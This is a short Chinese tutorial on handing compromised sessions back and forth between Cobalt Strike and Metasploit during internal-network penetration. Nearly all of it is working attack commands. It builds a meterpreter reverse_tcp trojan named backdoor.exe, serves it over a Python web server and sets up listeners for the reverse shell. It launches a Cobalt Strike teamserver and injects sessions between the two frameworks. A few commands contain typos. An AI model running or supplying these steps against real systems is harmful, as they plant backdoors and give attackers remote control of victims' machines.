使用Cobalt Strike生成的會話和MSF相互連線,在內網滲透中,可以方便後期的滲透。
一、Cobalt Strike連線MSF會話
1. 上線msf會話
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > backdoor.exe
2. python開啟web服務,下載木馬
python3 -m http.server 80
3. msf進行監聽模式
msfconsole
use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.128
set lport 4444
run
執行木馬反彈shell
4. 開啟Cobalt Strike
./teamserver 10.10.10.128 123456
客戶端連線後,新增一個監聽
5. 會話轉移到CS上
backgroud
use exploit/window/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 10.10.10.128
set lport 8888
set DisablePayloadHandler True
set PrependMigrate True
sessions -l
set session 1
run
二、MSF連線Cobalt Strike會話
1. 新增一個監聽,生成一個木馬程式
2. 重新新增一個監聽器
3. 會話轉義到MSF
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport 9999
set lhost 0.0.0.0
exploit